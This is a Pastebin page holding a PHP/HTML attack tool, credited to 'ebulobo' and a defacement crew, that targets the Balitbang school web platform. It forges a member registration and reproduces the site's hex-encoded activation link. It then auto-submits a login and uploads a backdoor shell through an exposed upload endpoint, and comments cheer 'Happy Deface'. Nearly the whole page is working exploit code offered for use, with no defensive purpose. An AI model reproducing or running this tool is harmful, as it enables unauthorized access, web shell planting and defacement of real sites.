API tools faq
paste
Advertisement
ebulobo

Balitbang/users

ebulobo
Mar 27th, 2017
75
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.49 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <!---
  3. // Script CSRF by EBULOBO
  4. // --------------------------
  5. // Shell Backdoor harus *.phtml
  6. // Upload Csrf ini dengan format itw.php
  7. // --------------------------
  8. // Happy Deface :v
  9. // --------------------------
  10. // All Team From Indonesia To World :
  11. EBULOBO | 0N3R1D3R | ./N30F0RC3 | CYB3RH00D |
  12. XS4BL9 | Mr.P0ME404
  13. // --------------------------
  14. -->
  15. <head>
  16. <title>CSRF BALITBANG BY EBULOBO</title>
  17. </head>
  18. <style type="text/css">
  19. input[type=text],input[type=code],input[type=password]{
  20. border:1px solid #c0c0c0;
  21. height:24px;
  22. padding:5px;
  23. }
  24. </style>
  25. <body>
  26. <?php
  27. function hex($str='',$code='') {
  28. if(($code>=0)and($code<100)) {
  29. $t .=dechex(strlen($str)+$code)."g";
  30. $str=strrev($str);
  31. for($i=0;$i<=strlen($str)-1;$i++) {
  32. $t .=dechex(ord(substr($str,$i,1))+$code);
  33. }
  34. }
  35. return $t;
  36. }
  37. function unhex($str='',$code='') {
  38. $all=explode("g",$str);
  39. $head=hexdec($all[0])-$code;
  40. $content=$all[1];
  41. if($head==(strlen($content)/2)) {
  42. for($i=0;$i<=$head-1;$i++) {
  43. $t .=chr(hexdec(substr($content,$i*2,2))-$code);
  44. }
  45. $t =strrev($t);
  46. }
  47. return $t;
  48. }
  49. $target = $_GET['target'];
  50. $ur_target = $target."/users/membersave.php";
  51. $ur_upload = $target."/procs/212sim-materi.php";
  52. $captcha = $target."/procs/captcha/captcha.php";
  53. $ur_login = $target."/users/ajax_login.php";
  54. $userx = $_GET['n'];
  55. $passx = $_GET['p'];
  56. if(isset($_POST['next'])){
  57. $tar = $_POST['tar'];
  58. $n = $_POST['n'];
  59. $p = $_POST['p'];
  60. header("Location: itw.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
  61. }
  62. echo "CSRF Regstration Form + Shell Uploader By Ebulobo<hr>";
  63. ?>
  64. <form method="post" action="" enctype="multipart/form-data">
  65. <table id=tablebaru cellspacing='1' cellpadding='3'>
  66. <tr>
  67. <td>Target</td>
  68. <td>:</td>
  69. <td><input type="text" name="tar" size="66" placeholder='http://'/></td>
  70. </tr>
  71. <tr>
  72. <td>Username</td>
  73. <td>:</td>
  74. <td><input type="text" name="n" size="66"/></td>
  75. </tr>
  76. <tr>
  77. <td>Password</td>
  78. <td>:</td>
  79. <td><input type="text" name="p" size="66"/></td>
  80. </tr>
  81. <tr>
  82. <td></td>
  83. <td></td>
  84. <td><input type="submit" name="next" value="GO &raquo;"/></td>
  85. </tr>
  86. </table>
  87. </form>
  88. <hr>
  89. <?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
  90. $asli = hex($userx,"82");
  91. $pass = hex($passx,"82");
  92. echo "Username : <b>$userx</b><br>";
  93. echo "Password : <b>$passx</b><hr>";
  94. ?>
  95. <form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
  96. <input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
  97. <input type=hidden name='name' value='ebulobo'/>
  98. <input type=hidden name='username' value='<?php echo $userx;?>'/>
  99. <input type=hidden name='password' value='<?php echo $passx;?>'/>
  100. <input type=hidden name='email' value='bla-bla-bla@gmail.com'/>
  101. <input type=hidden name='kelamin' value='m'/>
  102. <input type=hidden name='jenis' value='Tamu'>
  103. <input type=hidden name='kelas' value=''/>
  104. <input type=hidden name='hari' value='01'/>
  105. <input type=hidden name='bulan' value='01'/>
  106. <input type=hidden name='tahun' value='1990'/>
  107. <input type=hidden name='nis' value=''/>
  108. <input type=hidden name='pertanyaan' value='1'/>
  109. <input type=hidden name='jawaban' value='1'/>
  110. <input type=hidden name='kerja' value='Guru'/>
  111. <input type=hidden name='alamat' value='jauh'/>
  112. <input type=hidden name='sekolah' value='terserah'/>
  113. <input type=hidden name='telp' value='0'/>
  114. <input type=hidden name='blog' value=''/>
  115. <input type=hidden name='tentang' value='terserah'/>
  116. <input type=hidden name='country' value='INDONESIA'/>
  117. <input type=hidden name='stprofil' value='open'/>
  118. <input type=hidden name='stblog' value='on'/>
  119. <table>
  120. <tr>
  121. <td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
  122. <td rowspan="2" valign="top"><i>&raquo; Capture Target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
  123. </tr>
  124. <tr>
  125. <td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
  126. <td valign="top"><input type=submit name='submit' value='SIKAT &raquo;'/></td>
  127. </tr>
  128. </table>
  129. </form>
  130. <?php
  131. echo "<!--
  132. ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
  133. -->
  134. ";
  135. echo "Langkah Selanjutnya:<br>1. Setelah Registrasi Berhasil, <input type='button' value='KLIK DISINI' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> Untuk Aktivasi/Verifikasi!.
  136. <br><i>&raquo; Capture Target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah Terakhir, Upload Backdoornya <input type='button' onclick=\"window.location.href='itw.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='DISINI'/><hr>";
  137. } else if(isset($_GET['load']) && $_GET['load'] == "upload"){
  138. ?>
  139. <script type="text/javascript">
  140. window.onload = function(){
  141. document.forms['login_form'].submit()
  142.  
  143. }
  144. function setURL(url){
  145. document.getElementById('verif').src = url;
  146. }
  147. </script>
  148. <form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
  149. <input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
  150. <input type='hidden' name='password' value="<?php echo $passx;?>"/>
  151. Jika Tidak Bisa Login Dihalaman Member, <input type='submit' name='submit' value='KLIK DISINI'/>
  152. </form>
  153. <div style='margin-top:-20px;'>
  154. <iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
  155. </div>
  156. <form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
  157. <input type='hidden' name='pesan' value='abcabcabc'/></td>
  158. <table cellspacing='1' cellpadding='3'>
  159. <tr>
  160. <td valign='top'>File</td>
  161. <td valign='top'>:</td>
  162. <td valign='top'><input type='file' name='file'></td>
  163. <td valign='top' align='right'><input type='submit' value=' SIMPAN '/></td>
  164. </tr>
  165. <tr>
  166. <td valign='top' colspan="4"><i>&raquo; Capture Target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
  167. </tr>
  168. <tr>
  169. <td valign='top' colspan="4">
  170. Hasil Upload (.phtml): <a href="<?php echo $target."/files/tugas/tgs-ebulobo.php3";?>" target="_blank"><?php echo $target."/files/tugas/tgs-ebulobo.php3";?></a></td>
  171. </tr>
  172. </table>
  173. <input type=hidden name='st' value='ebulobo'>
  174. <input type=hidden name='nis' value=''>
  175. <input type=hidden name='idtugas' value=''>
  176. </form>
  177. <hr>
  178. <br>
  179. Thanks To All Team:
  180. <br>
  181. EBULOBO | 0N3R1D3R | ./N30F0RC3 | CYB3RH00D | XS4BL9 | Mr.P0ME40
  182. <?php } ?>
  183. </body>
  184. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!